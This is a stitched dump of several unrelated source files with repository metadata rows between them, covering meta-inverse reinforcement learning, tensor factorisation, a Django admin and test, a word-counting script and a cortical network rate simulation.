    the current meta-parameters ``theta`` and from scratch, and nudges
    ``theta`` towards the per-task solution so it becomes a good IRL
    initialisation across tasks.
    """

    def __init__(
        self,
        N=100,
        batch_size=20,
        meta_lr=0.1,
        size=5,
        p_slip=0,
        terminal=None,
        debug=False,
        theta=None,
        discount=0.7,
        draw=False,
        validate_step=100000,
        model="Gaussian"
    ):
        # N: meta-iterations; batch_size: expert trajectories per task;
        # meta_lr: meta update step size; size: gridworld side length;
        # p_slip: transition noise; terminal: fixed goal or None for random;
        # theta: initial meta reward weights; model: "Gaussian" fits a 2-D
        # gaussian to the reward map before interpolating, "Naive" updates
        # the raw weight vector directly.
        self.N = N
        self.batch_size = batch_size
        self.meta_lr = meta_lr
        self.size = size
        self.p_slip = p_slip
        self.terminal = terminal
        self.debug = debug
        self.theta = theta
        self.discount = discount
        self.draw = draw
        self.validate_step = validate_step
        self.model = model

    def maml(self, theta=None):
        """Run the full meta-training loop; returns (training, validation) logs."""
        if theta is None: theta = self.theta
        # Per-iteration logs for the training tasks...
        data = {
            "thetas": [],
            "groundTruthReward": [],
            "phi_loss": [],
            "reg_loss": [],
            "mamlReward": [],
            "regularReward": [],
            "worlds": [],
            "validation_score": [],
            "regular_score": [],
            "policy_score": [],
            "reg_policy_score": []
        }
        # ...and for the periodic validation passes.
        valid_data = {
            "thetas": [],
            "groundTruthReward": [],
            "phi_loss": [],
            "reg_loss": [],
            "mamlReward": [],
            "regularReward": [],
            "worlds": [],
            "validation_score": [],
            "regular_score": [],
            "policy_score": [],
            "reg_policy_score": []
        }
        for ind in range(self.N):
            if self.debug: print("Iteration #{0}".format(ind))
            theta = self.maml_step(data, theta)
            if ind % self.validate_step == 0:
                # Validation pass: run one extra task without keeping its
                # theta, temporarily forcing verbose output.
                print("Validation for step #{0}".format(ind))
                real_debug = self.debug
                self.debug = True
                _ = self.maml_step(valid_data, theta)
                self.debug = real_debug
        return data, valid_data

    def maml_step(self, data, theta):
        """Run one meta-iteration, append its metrics to *data*, return new theta."""
        startTime = time.time()
        theta, phi, theta_regular, gt_reward, world, phi_loss, reg_loss = self.maml_iteration(theta)
        # rewards:
        features = World.state_features(world)
        mamlReward = features.dot(phi)
        regularReward = features.dot(theta_regular)
        validation_score, regular_score, policy_score, reg_policy_score = self.calc_rewards(
            world,
            gt_reward,
            mamlReward,
            regularReward
        )
        data["thetas"].append(theta.copy())
        data["groundTruthReward"].append(gt_reward)
        data["phi_loss"].append(phi_loss)
        data["reg_loss"].append(reg_loss)
        data["mamlReward"].append(mamlReward)
        data["regularReward"].append(regularReward)
        data["worlds"].append(world)
        data["validation_score"].append(validation_score)
        data["regular_score"].append(regular_score)
        data["policy_score"].append(policy_score)
        data["reg_policy_score"].append(reg_policy_score)
        executionTime = (time.time() - startTime)
        if self.debug:
            print('Execution time: {0} (sec) - \
policy score: {1}, regular policy score: {2}'.
                format(
                    round(executionTime, 2),
                    policy_score,
                    reg_policy_score
                )
            )
        return theta

    def maml_iteration(self, theta):
        """Sample a task, fit MaxEnt IRL from theta and from scratch, update theta."""
        # set-up mdp
        world, reward, terminal = utils.setup_mdp(self.size, self.p_slip, location=self.terminal)
        # get expert trajectories
        trajectories, expert_policy = utils.generate_trajectories(
            world,
            reward,
            terminal,
            n_trajectories=self.batch_size,
            discount=self.discount
        )
        # optimize with maxent
        phi, phi_reward = utils.maxent(
            world,
            terminal,
            trajectories,
            theta
        )
        phi_loss = self.get_loss(world, reward, phi_reward)
        # Get a theta for an untrained init:
        theta_regular, reg_reward = utils.maxent(
            world,
            terminal,
            trajectories
        )
        reg_loss = self.get_loss(world, reward, reg_reward)
        if self.draw: utils.plot_rewards(world, reward, expert_policy, trajectories, phi, theta_regular)
        # update theta:
        theta = self.update_theta(theta, phi, self.meta_lr, phi_loss)
        phi = self.update_theta(None, phi, self.meta_lr, phi_loss)
        theta_regular = self.update_theta(None, theta_regular, self.meta_lr, reg_loss)
        if self.debug: print("phi loss: {0} : regular loss: {1}".format(phi_loss, reg_loss))
        return theta, phi, theta_regular, reward, world, phi_loss, reg_loss

    def get_loss(self, world, gt_reward, reward):
        """Fraction of states where the greedy policy under *reward* disagrees
        with the greedy policy under the ground-truth *gt_reward*."""
        # Calculate loss:
        optimal_policy_value = Solver.optimal_policy_value(world, gt_reward, self.discount)
        maxent_policy_value = Solver.optimal_policy_value(world, reward, self.discount)
        # validate
        loss = self.validate(world, optimal_policy_value, maxent_policy_value)
        return loss

    def update_theta(self, theta, phi, meta_lr, loss):
        """
        Update theta
        """
        # normalize phi
        phi = phi / phi.max()
        if theta is None: theta = phi #/ phi.shape[0]
        if self.model == "Gaussian":
            # Fit 2-D gaussians to both reward maps (reshape assumes a square
            # grid), interpolate in gaussian-parameter space scaled by the
            # loss, then rasterise back to a flat weight vector.
            phi_mat = phi.reshape(int(np.sqrt(phi.shape[0])), -1)
            gauss_phi = Gfit.fitgaussian(phi_mat)
            # phi_fit = Gfit.gaussGrid(phi_mat.shape, *gauss_phi)
            theta_mat = theta.reshape(int(np.sqrt(theta.shape[0])), -1)
            gauss_theta = Gfit.fitgaussian(theta_mat)
            # theta = theta + meta_lr * (phi - theta)
            gauss_theta = gauss_theta + loss * meta_lr * (gauss_phi - gauss_theta)
            theta_mat = Gfit.gaussGrid(phi_mat.shape, *gauss_theta)
            theta = theta_mat.reshape(-1)
            # normalize theta:
            theta = theta / theta.max()
        elif self.model == "Naive":
            # Plain interpolation towards phi, scaled by how badly phi scored.
            theta = theta + loss * meta_lr * (phi - theta)
        else:
            raise ValueError("model is undefined")
        return theta

    def validate(self, world, optimal_policy_value, agent_policy_value):
        """Disagreement rate between the greedy policies induced by the two
        state-value vectors, normalised by the number of grid cells."""
        agent_policy = np.array([
            np.argmax([agent_policy_value[world.state_index_transition(s, a)] for a in range(world.n_actions)])
            for s in range(world.n_states)
        ])
        # Every equally-good greedy action counts as correct for the agent.
        optimal_options = []
        for s in range(world.n_states):
            values = [optimal_policy_value[world.state_index_transition(s, a)] for a in range(world.n_actions)]
            optimal_options.append(np.argwhere(values == np.amax(values)))
        # compare the policies, remember that the terminal state's policy is unneeded
        error_num = sum([agent_policy[s] not in optimal_options[s] for s in range(world.n_states)])
        return error_num / self.size**2

    def calc_rewards(self, world, gt_reward, maml_reward, reg_reward):
        """Score both learned rewards against the ground truth: squared reward
        error plus greedy-policy disagreement, for the MAML and scratch fits."""
        # optimal policy:
        optimal_policy_value = Solver.optimal_policy_value(world, gt_reward, self.discount)
        maxent_policy_value = Solver.optimal_policy_value(world, maml_reward, self.discount)
        reg_maxent_policy_value = Solver.optimal_policy_value(world, reg_reward, self.discount)
        # validate
        policy_score = self.validate(world, optimal_policy_value, maxent_policy_value)
        reg_policy_score = self.validate(world, optimal_policy_value, reg_maxent_policy_value)
        validation_score = sum((maml_reward - gt_reward)**2)
        regular_score = sum((reg_reward - gt_reward)**2)
        return validation_score, regular_score, policy_score, reg_policy_score
#%% MAIN
if __name__ == '__main__':
    startTime = time.time()
    # parameters
    size = 5
    p_slip = 0.5
    N = 10
    validate_step = 2
    batch_size = 10
    meta_lr = 0.1
    terminal = None
    debug = False
    model = "Naive"
    # Mandril class:
    mandril = Mandril(
        N=N,
        batch_size=batch_size,
        meta_lr=meta_lr,
        size=size,
        p_slip=p_slip,
        terminal=terminal,
        debug=debug,
        validate_step=validate_step,
        model=model
    )
    # run maml:
    data, valid_data = mandril.maml()
    # Print output:
    print('Theta: {0}'.format(data["thetas"][-1]))
    executionTime = (time.time() - startTime)
    # Mean policy-disagreement score over each tenth of the run, for the
    # meta-initialised fit and the from-scratch MaxEnt fit.
    print("mean validations per tenths:")
    print([np.round(np.mean(data["policy_score"][int(N / 10) * i :
        int(N / 10) * (i + 1)]), 2) for i in range(10)])
    print("Regular maxent:")
    print([np.round(np.mean(data["reg_policy_score"][int(N / 10) * i :
        int(N / 10) * (i + 1)]), 2) for i in range(10)])
    print('Total execution time: {0} (sec)'.format(executionTime))
    # Plot both loss curves against the iteration index.
    fig = plt.figure(figsize=(12,8))
    plt.plot(range(N), data["phi_loss"][:N], data["reg_loss"][:N])
    plt.legend(["phi_loss", "reg_loss"])
    plt.title("Loss for mandril, vs. loss for regular maxent for p_slip of: {0}".format(p_slip))
plt.show() | [
"gdhecht@gmail.com"
] | gdhecht@gmail.com |
f70776b1699a7ac825b34acd41be2609e970d1fc | 507e912bc890813f138b019b9afe30456b02a1f7 | /pycfm/model.py | b3e02521f39d74116b80a00cd2f58d6587a04667 | [
"BSD-3-Clause"
] | permissive | nils-werner/pyCFM | 0393f8629883a3ffd440988171a7e105aa191de8 | 130eaf8b9ec819d44ce574cf97aa97b06e4d7ede | refs/heads/master | 2021-01-20T16:30:49.571668 | 2016-03-11T15:01:36 | 2016-03-11T15:01:36 | 53,676,018 | 0 | 0 | null | 2016-03-11T15:21:14 | 2016-03-11T15:21:14 | null | UTF-8 | Python | false | false | 3,189 | py | import numpy as np
import tqdm
try:
from opt_einsum import contract as einsum
except ImportError:
from numpy import einsum
def hat(P, At, Ac, eps=None):
    """Reconstruct the model tensor V(a,b,f,t,c) = eps + sum_j P[a,b,f,j] *
    At[t,j] * Ac[c,j]; *eps* defaults to machine epsilon to keep it positive."""
    floor = np.finfo(float).eps if eps is None else eps
    return floor + einsum('abfj,tj,cj->abftc', P, At, Ac)
def nnrandn(shape):
    """Generate a random nonnegative ndarray of the given shape.

    Parameters
    ----------
    shape : tuple
        Desired output shape.

    Returns
    -------
    out : array of given shape
        Absolute values of standard-normal samples, so every entry is >= 0.
    """
    return np.fabs(np.random.randn(*shape))
class CFM(object):
    """The Common Fate model

    Vj(a,b,f,t,c) = P(a,b,f,j)At(t,j)Ac(c,j)

    So we have one modulation texture "shape" for each frequency,
    hence P(a,b,f,j) which is activated over time, this is At(t,j) and over
    channels, this is Ac(c,j)

    Parameters
    ---------
    data_shape : iterable
        A tuple of integers representing the shape of the
        data to approximate

    n_components : int > 0
        the number of latent components for the NTF model
        positive integer

    beta : float
        The beta-divergence to use. An arbitrary float, but not
        that non-small integer values will significantly slow the
        calculation down. Particular cases of interest are:

        * beta=2 : Euclidean distance
        * beta=1 : Kullback Leibler
        * beta=0 : Itakura-Saito
    """
    def __init__(
        self,
        data,
        nb_components,
        nb_iter=100,
        beta=1,
        P=None,
        At=None,
        Ac=None,
    ):
        # General fitting parameters
        self.data = data
        self.nb_components = nb_components
        self.beta = float(beta)
        self.nb_iter = nb_iter
        # Factorisation Parameters
        # Each factor is used as given when supplied, otherwise initialised
        # with nonnegative random values of the matching shape.
        if P is None:
            self.P = nnrandn(self.data.shape[:3] + (nb_components,))
        else:
            self.P = P
        if At is None:
            self.At = nnrandn((self.data.shape[3], nb_components))
        else:
            self.At = At
        if Ac is None:
            self.Ac = nnrandn((self.data.shape[4], nb_components))
        else:
            self.Ac = Ac

    def fit(self):
        """fits a common fate model to
        Z(a,b,f,t,i) = P(a,b,j)Af(f,j)At(t,j)Ac(i,j)
        """
        def MU(einsumString, Z, factors):
            # One multiplicative beta-divergence update: ratio of two
            # contractions of data/model against the other (fixed) factors.
            # NOTE(review): the Z argument is unused — self.data is read
            # directly; confirm this is intentional.
            Zhat = hat(self.P, self.At, self.Ac)
            return (
                einsum(
                    einsumString,
                    self.data * (Zhat ** (self.beta - 2)),
                    *factors) /
                einsum(
                    einsumString,
                    Zhat ** (self.beta - 1),
                    *factors
                )
            )
        # Update each factor in turn, holding the other two fixed.
        for it in tqdm.tqdm(range(self.nb_iter)):
            self.P *= MU('abftc,tj,cj->abfj', self.data, (self.At, self.Ac))
            self.At *= MU('abftc,abfj,cj->tj', self.data, (self.P, self.Ac))
            self.Ac *= MU('abftc,abfj,tj->cj', self.data, (self.P, self.At))
        return self

    @property
    def factors(self):
        # Current (P, At, Ac) factor triple.
        return (self.P, self.At, self.Ac)

    @property
    def approx(self):
        # Model reconstruction of the data tensor.
        return hat(self.P, self.At, self.Ac)
| [
"mail@faroit.com"
] | mail@faroit.com |
83027b62ac40aff7b463752f943ed54795863c91 | d5ef24edc540f4dcc48a26d19ee95a3de302c55f | /classes/objects/Classroom.py | 96551c65cd65075058e117a098ab409e31365ec2 | [] | no_license | Yoske62/nadav | 526275e1501116263d4b293b0308f52bd7bd9848 | 588fcd7f509da111f82cbea2788c6940f645233c | refs/heads/master | 2020-03-27T21:06:55.690948 | 2018-09-09T05:35:48 | 2018-09-09T05:35:48 | 147,115,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | class Classroom(object):
    def __init__(self, Id: int, Name: str, Capacity: int, Notes: str):
        """Store the classroom's id, display name, seat capacity and
        free-form notes."""
        self.Id = Id
        self.Name = Name
        self.Capacity = Capacity
        self.Notes = Notes
"yoske62@gmail.com"
] | yoske62@gmail.com |
1fdeb7595c4c3e0ed8c1014b6e108291cd62d892 | c745592e6002d0efb6b18a71554ec1e6bebf8ca4 | /article/admin.py | 492755ed705d3411707556cec007becb084f6c0a | [] | no_license | Melish76/FirstProject_DJ | c001715c6178e868789084fc16f7b01a8974609a | e38e1d8f83f9132f0f98cec0e41c4515681616e9 | refs/heads/master | 2020-09-29T04:49:33.248469 | 2019-12-09T21:32:37 | 2019-12-09T21:32:37 | 226,955,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | from django.contrib import admin
from .models import Article,Comment
# Register your models here.
@admin.register(Article)
class ArticleAdmin(admin.ModelAdmin):
    """Admin list configuration for Article records."""
    list_display=["title","author","created_date","content"]
    list_display_links=["title","created_date"]
    search_fields=["title"]
    list_filter=["created_date","title"]

    # NOTE(review): ModelAdmin does not read an inner Meta class; this block
    # appears to have no effect — confirm before relying on it.
    class Meta:
        model=Article
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
    """Admin list configuration for Comment records."""
    list_display=["comment_author","comment_content","comment_date"]
    list_display_links=["comment_author","comment_content"]

    # NOTE(review): ModelAdmin does not read an inner Meta class; this block
    # appears to have no effect — confirm before relying on it.
    class Meta:
        model=Comment
"meleyke.huseynova03@gmail.com"
] | meleyke.huseynova03@gmail.com |
f25fdbddc9fdfd5ca2a2de6f20f15a4640927b86 | 3ebb50b403ab32fccfab9279232682f1ef9005bf | /accounts/tests/test_views.py | bc42629b08a65c01768fbda34d5cf4a35350f4ea | [] | no_license | leoalmeidab/tdd-project | 69a6c8c046e89ef5e090e6b9c308b12cd01fbbb8 | 2b5ce5fac153124addffd1796ae37a1b94f4daf5 | refs/heads/main | 2023-07-01T14:16:02.987515 | 2021-08-13T22:57:17 | 2021-08-13T22:57:17 | 392,769,061 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | from django.test import TestCase
import accounts.views
from unittest.mock import patch
class SendLoginEmailViewTest(TestCase):
    """Tests for the send_login_email view."""

    def test_redirects_to_home_page(self):
        # Submitting an email address should bounce the user back to "/".
        post_data = {'email': 'edith@example.com'}
        response = self.client.post('/accounts/send_login_email', data=post_data)
        self.assertRedirects(response, '/')

    @patch('accounts.views.send_mail')
    def test_sends_mail_to_address_from_post(self, mock_send_mail):
        # The POST must trigger exactly one well-formed outgoing mail.
        self.client.post(
            '/accounts/send_login_email',
            data={'email': 'edith@example.com'},
        )
        self.assertEqual(mock_send_mail.called, True)
        args, kwargs = mock_send_mail.call_args
        subject, body, from_email, to_list = args
        self.assertEqual(subject, 'Your login link for Superlists')
        self.assertEqual(from_email, 'noreply@superlists')
        self.assertEqual(to_list, ['edith@example.com'])
| [
"leonardobrito@dcc.ufmg.br"
] | leonardobrito@dcc.ufmg.br |
7cca7a15eb838322918f35d63c3ebf8e698d8601 | 2008aa05fc64a4787d6f2f0f9cdce4ce98dc9fe2 | /app/bootstrap/Directories.py | df88728830263ae9b801bf0902648127c3d5350a | [] | no_license | filljoyner/web-traffic-classifier | a7ff503a52287bf9f863e58f735dde564c960f96 | 38b2fe9cadc60d0610364a08204b85c0c62fb507 | refs/heads/master | 2020-06-24T08:40:58.655140 | 2019-07-26T02:09:14 | 2019-07-26T02:09:14 | 198,917,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | from app.components.FileSystem import FileSystem
class Directories:
    """Registry of well-known application directories (base, logs, workspace)."""

    def __init__(self):
        # Bug fix: the directory map used to be a class-level dict, so every
        # instance shared (and clobbered) the same mapping. It is now built
        # per instance.
        self.dirs = {
            'base': None,
            'logs': None,
            'workspace': None
        }
        self.put('base', FileSystem.cwd())
        self.put('logs', self.get('base') + '/logs')
        self.put('workspace', self.get('base') + '/workspace')

    def all(self):
        """Return the full name -> path mapping."""
        return self.dirs

    def put(self, dir_key, dir_value):
        """Register or overwrite the path stored under *dir_key*."""
        self.dirs[dir_key] = dir_value

    def get(self, dir_key):
        """Return the path registered for *dir_key* (KeyError if unknown)."""
        return self.dirs[dir_key]
"filljoyner@gmail.com"
] | filljoyner@gmail.com |
a995f929cf702e3cf0ce056d4ed20bda47b8f3d4 | ad6cc209b3251c2074920a893afcb48831af6dc1 | /word_count.py | 8eeb5a5efea83d6e3d3254384ea359306f820db3 | [] | no_license | ackendal/transcriptTools | 762efaadbef043c7e077b7b96ba1f63552a743c9 | 0ceefeb367dddae034264e9faee41e9407eac201 | refs/heads/master | 2022-11-23T23:37:18.075033 | 2020-07-29T16:34:36 | 2020-07-29T16:34:36 | 283,545,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,309 | py | #!/usr/bin/env python3
""" Alex Kendal, V00872134 *
* A program that reads a file and outputs a count of how *
* many words of all lengths it finds are in the file. *
* This list of counts can be sorted or unsorted (default) *
* and printed with or without (default) a list of the *
* words of each length. Only non letter characters are *
* .,();. *
"""
import argparse
import sys
"""
find_lowest_node: Function takes in a list and locates
the word that is alphabetically closest to a.
"""
def find_lowest_node(input):
    """Return the alphabetically smallest word in *input* (assumes non-empty)."""
    lowest = input[0]
    for candidate in input[1:]:
        if candidate < lowest:
            lowest = candidate
    return lowest
"""
clear_special_characters: Function takes in a string
and strips text of all characters that are not letters,
including the enter key, and makes all letters
lowercase.
"""
def clear_special_characters(input):
    """Lowercase *input* and replace the punctuation characters ( ) . , - ! ; ?
    plus newline/carriage-return with spaces; all other characters pass through."""
    blanked = set("().,-!;?\n\r")
    output = ""
    for ch in input:
        ch = ch.lower()
        output += " " if ch in blanked else ch
    return output
"""
max_length: Function takes in a list and outputs the
longest word length in the list.
"""
def max_length(input):
    """Return the length of the longest word in *input* (0 for an empty list)."""
    longest = 0
    for word in input:
        longest = max(longest, len(word))
    return longest
"""
frequencies: Function takes in a list of words and the
maximum length of a word and returns another list of
lengths and their corrosponding frequencies.
"""
def frequencies(input):
    """Count how often each word occurs in *input*.

    Parameters
    ----------
    input : list of str
        The words to count.

    Returns
    -------
    list of (word, count) tuples sorted by ascending count; ties keep
    first-occurrence order (matching the original stable sort).

    Fixes: removes leftover debug print() calls, dead bookkeeping variables
    (count/backcount/added), and the O(n^2) list rescan per word.
    """
    counts = {}
    for word in input:
        counts[word] = counts.get(word, 0) + 1
    # dict preserves insertion (first-occurrence) order; sorted() is stable.
    return sorted(counts.items(), key=lambda pair: pair[1])
def print_nicely(input):
    """Print (word, count) pairs as 'word: count ' entries, five per line."""
    pieces = []
    for position, pair in enumerate(input, start=1):
        pieces.append(str(pair[0]) + ": " + str(pair[1]) + " ")
        if position % 5 == 0:
            pieces.append("\n")
    print("".join(pieces))
"""
check_counts: precursor to print_words(). Runs through
a list of words and an expected value to be the length
of. It returns the number of words of that length. *
"""
def check_counts(input, count):
    """Return how many words in *input* have length exactly *count*."""
    return sum(1 for word in input if len(word) == count)
"""
print_by_length: Function to print in order from shortest
word length to longest. Takes in the list of frequencies
and whether to print words.
"""
def print_by_length(input, print_on, words):
    """Print one 'Count[length]=frequency;' line per entry, in list order,
    optionally followed by the words of that length.

    NOTE(review): expects dict entries with 'length'/'frequency' keys, which
    frequencies() above does not produce — confirm the caller's data shape.
    """
    for entry in input:
        line = "Count[" + str(entry['length']) + "]=" + str(entry['frequency']) + ";"
        if print_on:
            line += " " + print_words(words, entry['length'])
        print(line)
"""
print_by_frequency: Function to print in order from
least to most common lengths. Takes in the list of
frequencies and whether to print words.
"""
def print_by_frequency(input, print_on, words):
    """Print counts ordered by descending frequency.

    WARNING: destructively consumes *input* — entries are deleted as they
    are printed.

    NOTE(review): the module header says "least to most common", but the
    sort-then-reverse below yields most-common-first — confirm intent.
    """
    output = ""
    # NOTE(review): 'list' shadows the builtin; left unchanged here.
    list = [x['frequency'] for x in input]
    list.sort()
    list.reverse()
    for y in list:
        length = len(input)
        index = 0
        # Linear scan; restart from 0 after each deletion so indices stay valid.
        while(index < length):
            if(input[index]['frequency'] == y):
                l = str(input[index]['length'])
                f = str(y)
                output = ("Count[" + l + "]=" + f + ";")
                if print_on:
                    output += (" " + print_words(words, input[index]['length']))
                print(output)
                del input[index]
                length = length - 1
                index = 0
            else:
                index = index + 1
"""
print_words: Function to print words of a given length.
Takes in the list of words and the length to print.
"""
def print_words(input, count):
    """Build the string '(words: "w1", "w2" and "w3")' for every word in
    *input* whose length is *count*.

    Returns None when no word matches (mirroring the original early return).
    """
    matches = [word for word in input if len(word) == count]
    if not matches:
        return None
    if len(matches) == 1:
        return '(words: "' + matches[0] + '")'
    if len(matches) == 2:
        return '(words: "' + matches[0] + '" and "' + matches[1] + '")'
    # Three or more: comma-separate all but the last two, then
    # '"second-last" and "last"' (no Oxford comma, as in the original).
    leading = '", "'.join(matches[:-2])
    return ('(words: "' + leading + '", "' + matches[-2]
            + '" and "' + matches[-1] + '")')
def main():
    """Entry point: parse CLI flags, read the input file, and print
    word-length frequency counts.

    Flags: --infile <path> selects the input file; --sort orders output by
    frequency; --print-words appends the matching words to each count line.
    """
    file = None
    parser = argparse.ArgumentParser()
    parser.add_argument("--infile", action="store")
    parser.add_argument("--sort", action="store_true")
    parser.add_argument("--print-words", action="store_true")
    args = parser.parse_args()
    if args.infile:
        try:
            file = open(args.infile, "r")
        except FileNotFoundError:
            print("Cannot open input file.")
            sys.exit(1)
    if file is None:
        # Bug fix: previously execution fell through after this message and
        # crashed on file.read() with AttributeError; exit cleanly instead.
        print("No file could be accessed.")
        sys.exit(1)
    # Read the whole file, strip special characters, and split into words.
    text = file.read()
    file.close()
    text = clear_special_characters(text)
    words = text.split()
    max_len = max_length(words)  # renamed from 'max' to avoid shadowing the builtin
    freqlist = frequencies(words)
    print_nicely(freqlist)
    """
    Series of checks and functions calls. Options
    are between displaying counts sorted or
    unsorted, with or without a list of unique
    words used.
    """
    # if args.sort:
    #     print_by_frequency(freqlist, args.print_words, words)
    # else:
    #     print_by_length(freqlist, args.print_words, words)
# Run main() only when executed as a script (not when imported).
if __name__ == "__main__":
    main()
"ackendal@gmail.com"
] | ackendal@gmail.com |
7b2892cad079451cba41a6e4aedb3f7b79329670 | 7e43049360db50a8f9cdcf1ca4e531bb0d2bfc84 | /Simulation_29_ROIs_WhiteNoiseInput.py | a05f5f4a89d9d9bfdcb99bab7e37cab42fcdb998 | [] | no_license | OliverMount/LargeScaleNetwork | 9543a57f56aa7945acf49a942f6685dcb1cf46b7 | f522e203c5de44bb0695bdb78dae170bd35e8f4f | refs/heads/master | 2023-04-12T23:25:36.845497 | 2021-04-20T02:23:09 | 2021-04-20T02:23:09 | 344,648,230 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,379 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 29 15:26:04 2021
@author: olive
"""
#------------------------------------------------------------------------------
# Necessary modules
#------------------------------------------------------------------------------
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from numpy.random import normal as rnorm
p={} # Parameter dictionary
#------------------------------------------------------------------------------
# Network Parameters
#------------------------------------------------------------------------------
p['beta_exc'] = 0.066 # Hz/pA
p['beta_inh'] = 0.351 # Hz/pA
# Let us remember that we are keeping this as constant
p['tau_exc'] = 20 # ms #
p['tau_inh'] = 10 # ms
p['wEE'] = 24.3 # pA/Hz
p['wIE'] = 12.2 # pA/Hz
p['wEI'] = 19.7 # pA/Hz
p['wII'] = 12.5 # pA/Hz
p['muEE'] = 33.7 # pA/Hz
p['muIE'] = 25.3 # pA/Hz
p['eta'] = 0.68
####### ROI = 29 areas ################
# NOTE(review): hard-coded absolute paths; this script only runs on the
# original author's machine unless these are changed.
with open("/home/olive/Desktop/LSN/Jog/distMatval.txt") as f:
    contents=f.readlines()
# Inter-area distance matrix (loaded but not used further below).
DISTmtx =np.array([[float(k) for k in i.split()] for i in contents])
with open("/home/olive/Desktop/LSN/Jog/flnMatshuf2.txt") as f:
    contents=f.readlines()
# FLN (fraction of labeled neurons) connectivity matrix between areas.
FLN=np.array([[float(k) for k in i.split()] for i in contents])
areas=['V1','V2','V4','DP','MT','8m','5','8I','TEO','2','F1','STPc','7A','46d',
       '10','9/46v','9/46d','F5','TEpd','PBr','7m','7B','F2','STPi','PROm','F7',
       '8B','STPr','24c']
# Hierarchy values in [0, 1], one per area (same order as 'areas').
hier=np.array([[0,0.2,0.45,0.5,0.51,0.55,0.58,0.6,0.61,0.63,0.67,
                0.7,0.72,0.73,0.76,0.78,0.8,0.83,0.85,0.86,0.87,
                0.95,0.96,0.965,0.97,0.98,0.985,0.99,1]])
p['hier_vals'] = hier
p['fln_mat']=FLN
p['areas']=areas
p['n_area']=len(p['areas'])
# Excitatory strength scales linearly with hierarchy position.
p['exc_scale'] = (1+p['eta']*p['hier_vals'])
# Sign function
fI = lambda x : x*(x>0) # f-I curve: threshold-linear (ReLU)
########### Choose the injection area
area_act = 'V1'
print('Running network with stimulation to ' + area_act)
# Definition of combined parameters (local E/I coupling scaled by hierarchy)
local_EE = p['beta_exc'] * p['wEE'] * p['exc_scale']
local_EI = -p['beta_exc'] * p['wEI']
local_IE = p['beta_inh'] * p['wIE'] * p['exc_scale']
local_II = -p['beta_inh'] * p['wII']
fln_scaled = (p['exc_scale'] * p['fln_mat'].T).T
#---------------------------------------------------------------------------------
# Simulation Parameters
#---------------------------------------------------------------------------------
# White noise input parameters
me=2  # NOTE(review): unused below; the noise mean is hard-coded to 0 — confirm.
SD=0.5 # Hz
dt = 0.2 # ms
T = 2500 # ms
t_plot = np.linspace(0, T, int(T/dt)+1)
n_t = len(t_plot)
E_back=10 # Back-ground rate for excitation
I_back=35 # Back-ground rate for inhibition
# From target background firing inverts background inputs: solve the
# steady-state equations for the constant inputs that hold the network
# at the target background rates.
r_exc_tgt = E_back * np.ones(p['n_area'])
r_inh_tgt = I_back * np.ones(p['n_area'])
longrange_E = np.dot(fln_scaled,r_exc_tgt)
I_bkg_exc = r_exc_tgt - (local_EE*r_exc_tgt + local_EI*r_inh_tgt
                         + p['beta_exc']*p['muEE']*longrange_E)
I_bkg_inh = r_inh_tgt - (local_IE*r_exc_tgt + local_II*r_inh_tgt
                         + p['beta_inh']*p['muIE']*longrange_E)
# White noise stimulus input: strong noise into the stimulated area,
# very weak noise everywhere else.
I_stim_exc = np.zeros((n_t,p['n_area']))
area_stim_idx = p['areas'].index(area_act) # Index of stimulated area
area_no_stim=tuple([i for i in range(p['n_area']) if i != area_stim_idx])
#time_idx = (t_plot>100) & (t_plot<=350)
# NOTE(review): the literal 0.5 duplicates SD above — keep them in sync.
I_stim_exc[:,area_stim_idx] = rnorm(0,0.5,n_t)
I_stim_exc[:,area_no_stim] = rnorm(0,0.00005,(n_t,p['n_area']-1))
# Above value chosen so that V1 is driven up to 100 Hz
#---------------------------------------------------------------------------------
# Storage
#---------------------------------------------------------------------------------
r_exc = np.zeros((n_t,p['n_area']))
r_inh = np.zeros((n_t,p['n_area']))
#---------------------------------------------------------------------------------
# Initialization
#---------------------------------------------------------------------------------
# Set activity to background firing
r_exc[0] = r_exc_tgt
r_inh[0] = r_inh_tgt
#---------------------------------------------------------------------------------
# Running the network
#---------------------------------------------------------------------------------
# Forward-Euler integration of the threshold-linear rate equations.
for i_t in range(1, n_t):
    longrange_E = np.dot(fln_scaled,r_exc[i_t-1])
    print(longrange_E)  # NOTE(review): prints every timestep — likely leftover debug output.
    I_exc = (local_EE*r_exc[i_t-1] + local_EI*r_inh[i_t-1] +
             p['beta_exc'] * p['muEE'] * longrange_E +
             I_bkg_exc + I_stim_exc[i_t])
    I_inh = (local_IE*r_exc[i_t-1] + local_II*r_inh[i_t-1] +
             p['beta_inh'] * p['muIE'] * longrange_E + I_bkg_inh)
    d_r_exc = -r_exc[i_t-1] + fI(I_exc)
    d_r_inh = -r_inh[i_t-1] + fI(I_inh)
    r_exc[i_t] = r_exc[i_t-1] + d_r_exc * dt/p['tau_exc']
    r_inh[i_t] = r_inh[i_t-1] + d_r_inh * dt/p['tau_inh']
##############################################################################
########################### PLOTTING RESULTS #################################
##############################################################################
### Neural rate series plots: input trace on top, then one row per area.
_ = plt.figure(figsize=(4,4))
area_name_list = p['areas']
# Index -1 is a sentinel for the stimulus-input row.
area_idx_list = [-1]+[p['areas'].index(name) for name in area_name_list]
f, ax_list = plt.subplots(len(area_idx_list), sharex=True)
for ax, area_idx in zip(ax_list, area_idx_list):
    if area_idx < 0:
        y_plot = I_stim_exc[:, area_stim_idx]
        txt = 'Input'
    else:
        y_plot = r_exc[:,area_idx]
        txt = p['areas'][area_idx]
    # Plot the change relative to each trace's own minimum.
    y_plot = y_plot - y_plot.min()
    ax.plot(t_plot, y_plot)
    ax.text(0.9, 0.6, txt, transform=ax.transAxes)
    ax.set_yticks([y_plot.max()])
    ax.set_yticklabels(['{:0.4f}'.format(y_plot.max())])
    ax.spines["right"].set_visible(False)
    ax.spines["top"].set_visible(False)
    ax.xaxis.set_ticks_position('bottom')
    ax.yaxis.set_ticks_position('left')
f.text(0.01, 0.5, 'Change in firing rate (Hz)', va='center', rotation='vertical')
